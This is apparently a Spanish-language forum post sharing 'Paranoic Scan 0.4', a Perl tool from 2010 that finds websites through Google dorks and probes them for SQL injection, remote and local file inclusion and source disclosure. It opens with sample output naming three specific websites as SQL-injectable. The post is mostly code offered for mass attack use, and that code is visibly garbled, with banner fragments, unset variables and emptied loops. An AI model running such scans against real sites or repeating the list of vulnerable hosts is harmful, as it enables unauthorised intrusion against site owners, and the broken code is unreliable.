[+] SQLI : http://www.cibercolchon.com/ficha.php?id=
[+] SQLI : http://www.100citiesinitiative.org/ficha.php?ID=
[+] SQLI : http://www.nibbledpencil.com/ficha.php?id=
[Status] : Finish
(C) Doddy Hackman 2010
Codigo #!usr/bin/perl #Paranoic Scan 0.4 #(c)0ded by Doddy H 2010 use LWP::UserAgent; use HTTP::Request::Common; use URI ::Split qw(uri_split ); my $nave = LWP::UserAgent->new(); $nave->timeout(5); $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); sub head { @@@@@ @ @@@@ @ @@ @@@ @@@ @@@ @@@@ @@@ @@@@ @ @@ @@@ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @@ @ @@@ @ @ @@@ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @@@@@ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @@ @@@ @@@ @@@@@@ @@@@ @@@@@@ @ @@@ @@@ @@@ @@@ @@@ @@@ @@@@@@ @ ); } &menu; sub menu { &head; print "[a] : Scan a File\n"; print "[b] : Search in google and scan the webs\n\n"; if ($op=~/a/ig) { print "\n[+] Wordlist : "; chomp(my $word = <STDIN>); @paginas = repes(savewords($word)); my $option = &men; scan($option,@paginas); } elsif ($op=~/b/ig) { chomp(my $dork = <STDIN>); chomp(my $pag = <STDIN>); my $option = &men; @paginas = &google("www.google.com.ar",$dork,$pag); scan($option,@paginas); } else { &menu; } } sub scan { my ($option,@webs) = @_; print "\n[Status] : Scanning\n"; print "[Webs Count] : ".int(@webs)."\n\n"; for(@webs) { if ($option=~/S/ig) { &sql($_); } if ($option=~/L/ig) { &lfi($_); } if ($option=~/R/ig) { &rfi($_); } if ($option=~/F/ig) { &fsd($_); } if ($option=~/A/ig) { &sql($_); &lfi($_); &rfi($_); &fsd($_) } } } print "\n[Status] : Finish\n"; &finish; sub toma { return $nave->request (GET $_[0])->content; } sub savefile { open (SAVE ,">>logs/".$_[0]); } sub finish { print "\n\n\n(C) Doddy Hackman 2010\n\n"; <STDIN>; } sub google { print "\n[Google] : $_[0]\n[Dork] : $_[1]\n[Pages] : $_[2]\n\n[+] Searching pages..\n"; for ($pages=0;$pages<=$_[2];$pages=$pages+10) { $response = toma("http://$_[0]/search?hl=&q=$_[1]&start=$pages"); while ($response=~m/<h3 class =.*?<a href ="([^"]+).*?>(.*?)<\ /a >/g ) { }} print "[+] Cleaning results\n"; for(@founds) { $t = clean($_); } } sub sql { my ($pass1,$pass2) = ("+","--"); $code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2); if ($code1=~/The used SELECT statements have a different number of columns/ig) { print "[+] SQLI : $page\a\n"; savefile("sql-logs.txt",$page); }} sub rfi { $code1 = toma($page."http:/www.supertangas.com/"); if ($code1=~/Los mejores TANGAS de la red/ig) { #Esto es conocimiento de verdad xDDD print "[+] RFI : $page\a\n"; savefile("rfi-logs.txt",$page); }} sub lfi { $code1 = toma($page."'"); if ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) { print "[+] LFI : $page\a\n"; savefile("lfi-logs.txt",$page); }} sub fsd { my ($scheme, $auth, $path, $query, $frag) = uri_split($page); if ($path=~/\/(.*)$/) { my $me = $1; $code1 = toma($page.$me); if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) { print "[+] Full Source Discloure : $page\a\n"; savefile("fpd-logs.txt",$page); }}} sub repes { foreach my $palabra ( @_ ) { next if $repety{ $palabra }++; } } sub savewords { @words = <FILE>; for(@words) { $t = clean($_); } } sub men { print "\n\n[+] Scan Type : \n\n"; print "[F] : Full Source Discloure\n"; chomp(my $option = <STDIN>); } sub clean { if ($_[0] =~/\=/) { my @sacar= split("=",$_[0]); } } #The End #Contact : doddy-hackman[at]hotmail[com] #blog : doddy-hackman.blogspot.com
|
|
|
|
|
|
| |
|
Mostrar Mensajes